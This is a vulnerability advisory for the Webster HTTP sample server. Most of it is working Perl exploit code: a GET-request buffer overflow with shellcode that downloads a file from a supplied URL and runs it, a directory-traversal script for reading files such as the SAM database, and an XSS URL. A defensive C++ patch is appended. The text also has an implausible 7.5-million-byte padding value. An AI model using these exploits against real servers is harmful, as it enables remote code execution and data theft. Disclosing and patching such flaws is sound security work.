Webster HTTP Server Buffer Overflow Vulnerabilities

Summary

Webster HTTP Server is an HTTP/1.0 server written in C++ using Microsoft Foundation Classes (MFC). It runs on Windows 95, 98, NT, 2000, ME, and XP platforms. It was first published as a sample application in Microsoft Journal (MSJ). Multiple security flaws have been identified in Webster that could allow an attacker to take various actions on the server, ranging from script execution to complete compromise.

Credit:

‘The information has been provided by Matthew Murphy.’


Details

There are three vulnerabilities in Webster, all related to the processing of malicious requests:

I. Buffer Overrun
There is a security flaw in Webster that allows an attacker to completely compromise the server. If given a URI that is 275 characters or longer, the saved return address will be overwritten. Execution of arbitrary code is possible:

#!/usr/bin/perl
#
# Webster HTTPd GET Request Buffer Overflow
# Vulnerability discovery/exploit by Matthew Murphy
# Shellcode by Enrique A. Compañ Gzz.
# Download and execute arbitrary files on Webster sites
#
# Webster is an HTTP example server that was included in
# the MSDN sample pack. It offers basic static GET support,
# and does not use HTTP/1.1. By sending it a long request
# of roughly 275 bytes, a buffer in the program is overrun,
# and EIP is overwritten on return.
#
# A typical buffer overflow exploit includes its payload
# in the buffer it overflows. However, my buffer here, of
# only 275 bytes, was too small to hold a nearly 300 byte
# shellcode. Rather than fragment the shellcode and risk
# a crash of the server, I decided to put it in an HTTP
# header and jump to that buffer instead.
#
# I ran into another problem — my EIP was 0x008Exxxx. It
# wasn't totally static, and I couldn't put nulls in the
# request because Webster would reject it. So, I used an
# EIP of 0x01010101, and padded my buffer so that hitting
# too early resulted in a lot of INCs, but no useful code
# being run.
#
# The buffer overruns, and the saved return address is now
# 0x01010101. When Webster returns, it jumps out of the
# execution path, and straight into our HTTP header with
# a direct jump (UGH!!!), and hits a slide of 0x41 ('A')
# characters, and eventually hits the shellcode.
#
# The shellcode retrieves a file with urlmon.dll and runs
# it there. Webster is now dead, so you may include in
# your payload the ability to restart the server.
#
# Simple firewalling will stop this exploit, as the HTTP
# service shouldn't be contacting other hosts to begin
# with.

use IO::Socket;

# kernel32.dll base address, little-endian
# when changing this, replace 0x00 with 0xFF.
# DEFAULT=0x77E80000
$k32_base = "\xFF\xFF\xE8\x77";

# Request line: "/" followed by 270 'a' characters fills the 271-byte
# target, and the next four bytes (0x01010101) land on the saved
# return address, for a 275-byte URI in total.
$a  = "GET /" . ("a" x 270) . "\x01\x01\x01\x01" . " HTTP/1.0\r\n";
# The User-Agent header carries the 'A' slide and the shellcode.
$a .= "User-Agent: ";
$a .= "A" x 7536897;

# Executor shellcode by Enrique A. Compañ Gzz.

$a .= "\xEB\x67\x5E\x8B\xEC\x8B\x06\x66\x33\xC0\x8B\xD8\x03\x40\x3C\x8B\x40";
$a .= "\x78\x03\xC3\x8B\x78\x20\x8D\x3C\x3B\x03\x1F\x33\xD2\x33\xC9\x43\x38";
$a .= "\x13\x75\x01\x41\x81\x3B\x47\x65\x74\x50\x75\x0B\x81\x7B\x04\x72\x6F";
$a .= "\x63\x41\x75\x02\x74\x02\xEB\xE5\x50\x41\x33\xC0\xB0\x04\xF7\xE1\x8B";
$a .= "\xC8\x58\x03\xC1\x83\xC0\x24\xFF\x76\x02\x66\xFF\x30\x5B\x56\x83\xC6";
$a .= "\x04\x46\x80\x3E\xFF\x75\x03\x80\x36\xFF\x81\x3E\x4B\x49\x4B\x45\x75";
$a .= "\xEF\xEB\x02\xEB\x4B\x5E\x8B\xE5\x8B\x06\x66\x33\xC0\x50\x83\xC6\x04";
$a .= "\x56\x50\xFF\xD3\x83\xC6\x0D\x56\xFF\xD0\x83\xC6\x07\x56\x50\xFF\xD3";
$a .= "\x33\xC9\x51\x51\x83\xC6\x13\x56\x83\xC6\x1C\x56\x51\xFF\xD0\x58\x50";
$a .= "\x83\xEE\x08\x56\x50\xFF\xD3\x33\xC9\x51\x83\xEE\x14\x56\xFF\xD0\x58";
$a .= "\x83\xC6\x08\x56\x50\xFF\xD3\x33\xC9\x51\xFF\xD0\xE8\x47\xFF\xFF\xFF";
$a .= $k32_base;
# String table read by the shellcode; each entry is 0xFF-terminated.
$a .= "LoadLibraryA" . "\xFF" . "URLMON" . "\xFF" . "URLDownloadToFileA" . "\xFF";
$a .= "sys.exe" . "\xFF" . "ExitProcess" . "\xFF" . "WinExec" . "\xFF";
$a .= $ARGV[0];
# "KIKE" is the end marker the shellcode scans for.
$a .= "\xFF" . "KIKE" . "\r\n\r\n";

if (@ARGV > 3 || @ARGV < 2) {
  print STDOUT "Usage: perl $0 [filename] [host] [port]\n";
  exit;
}
$port = 80;
if (@ARGV == 3) {
  $port = $ARGV[2];
}
$f = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[1], PeerPort=>$port);
if (defined($f)) {
  $f->autoflush(1);
  print $f $a;
  undef $f;
  $mesg = sprintf("Telnet in on port %d to %s\n", $port, $ARGV[1]);
} else {
  $mesg = sprintf("Connection refused when connecting to %s on port %d\n", $ARGV[1], $port);
}
print STDOUT $mesg;

II. Directory Traversal
Another, separate security flaw occurs with poor path validation. Webster will follow '/../' sequences in URL path names, allowing access to files above the document root. This vulnerability may be used for further compromise if security-sensitive files are retrieved (the Windows NT SAM file, for instance).

#!/usr/bin/perl
#
# Webster Directory Traversal Vulnerability
# Discovery/Exploit by Matthew Murphy

use IO::Socket;
use URI::Escape;

if (@ARGV < 2 || @ARGV > 3) {
  print STDOUT "Usage: perl $0 [filename] [host] [port=80]\n";
  exit;
}
if (@ARGV == 3) {
  $port = $ARGV[2];
} else {
  $port = 80;
}
# Percent-encode the requested file name; the leading "/../" run walks
# out of the document root because Webster never canonicalises the path.
$filename = uri_escape($ARGV[0]);
$exploit = "GET /../../../../../../../../../%s HTTP/1.0\r\n\r\n";
$f = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[1], PeerPort=>$port);
if (defined($f)) {
  $f->autoflush(1);
  $packet = sprintf($exploit, $filename);
  print $f $packet;
  # Echo the server's response (headers and file body) to stdout.
  while (defined($line = <$f>)) {
    print STDOUT $line;
  }
  undef $f;
} else {
  print STDOUT "ERROR: Connection refused\n";
}

III. Cross-site Scripting
Another small vulnerability was uncovered in Webster. If a path name containing HTML markup is used, that path will be returned to the browser as HTML content, enabling zone bypass.

Example:
http://websterhost.edu/<SCR*IPT>alert(document.URL)</SCRIPT>/
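The request handling that closes all three items, as an added example written for this advisory (not Webster's or the advisory's own code): the request target is length-checked before it is copied anywhere (item I), "/../" segments are resolved lexically so the result can never leave the document root (item II), and the path is HTML-escaped before it is echoed back (item III). The docroot string, the kMaxTargetLen bound and the function names are assumptions.

```cpp
#include <optional>
#include <string>
#include <vector>

// Assumed bound: Webster's target buffer failed at 275 bytes, so any
// request target above this limit is refused before it is copied anywhere.
constexpr std::size_t kMaxTargetLen = 255;

// Map a request target onto a file under docroot; std::nullopt means too
// long, not rooted at "/", or climbing above docroot. Assumes the target
// is already percent-decoded: decode first, then validate.
std::optional<std::string> resolve_request_path(const std::string& docroot,
                                                const std::string& target) {
    if (target.empty() || target[0] != '/' || target.size() > kMaxTargetLen)
        return std::nullopt;
    std::vector<std::string> parts;
    std::size_t pos = 0;
    while (pos <= target.size()) {
        std::size_t next = target.find('/', pos);
        if (next == std::string::npos) next = target.size();
        std::string seg = target.substr(pos, next - pos);
        pos = next + 1;
        if (seg.empty() || seg == ".") continue;     // "//" and "/./" are no-ops
        if (seg == "..") {
            if (parts.empty()) return std::nullopt;  // would escape the root
            parts.pop_back();
            continue;
        }
        // Windows also treats '\' as a separator: refuse it inside a segment.
        if (seg.find('\\') != std::string::npos) return std::nullopt;
        parts.push_back(seg);
    }
    std::string out = docroot;
    for (const std::string& p : parts) out += "/" + p;
    return out;
}

// Escape a path before echoing it into an HTML response (item III), so
// markup in the request can only ever be displayed, never executed.
std::string html_escape(const std::string& s) {
    std::string out;
    for (char c : s) {
        if (c == '<') out += "&lt;";
        else if (c == '>') out += "&gt;";
        else if (c == '&') out += "&amp;";
        else if (c == '"') out += "&quot;";
        else out += c;
    }
    return out;
}
```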
